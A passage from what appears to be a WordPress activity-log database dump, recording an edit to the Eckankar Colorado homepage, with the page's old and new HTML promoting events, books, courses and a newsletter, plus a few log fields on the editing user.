href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241306,41018,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px;\" data-font-weight=\"600\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 33px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: \'Raleway\'; font-weight: 600; color: #697085; text-align: center;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 15px;\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 16px; font-weight: 600;\" data-font-weight=\"600\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px; margin-bottom: 24px;\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 600;\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\" data-font-weight=\"600\">(Initiates Subscribe Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 15px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and<br>\r\n<strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(241296,41017,'_message_key','post_updated'),(241297,41017,'_user_id','2'),(241298,41017,'_user_login','S8zhaBda'),(241299,41017,'_user_email','nada@zipnadanot.org'),(241300,41017,'_server_remote_addr','76.130.120.x'),(241301,41017,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=7160&action=edit'),(241302,41018,'post_id','7160'),(241303,41018,'post_type','page'),(241304,41018,'post_title','Home'),(241305,41018,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div 